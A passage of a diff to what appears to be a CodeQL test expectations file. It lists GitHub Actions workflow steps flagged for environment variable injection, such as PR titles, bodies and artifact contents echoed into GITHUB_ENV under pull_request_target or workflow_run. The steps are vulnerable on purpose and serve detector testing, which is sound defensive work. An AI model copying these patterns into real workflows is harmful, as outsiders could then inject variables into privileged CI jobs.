${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | @@ -129,3 +92,40 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body 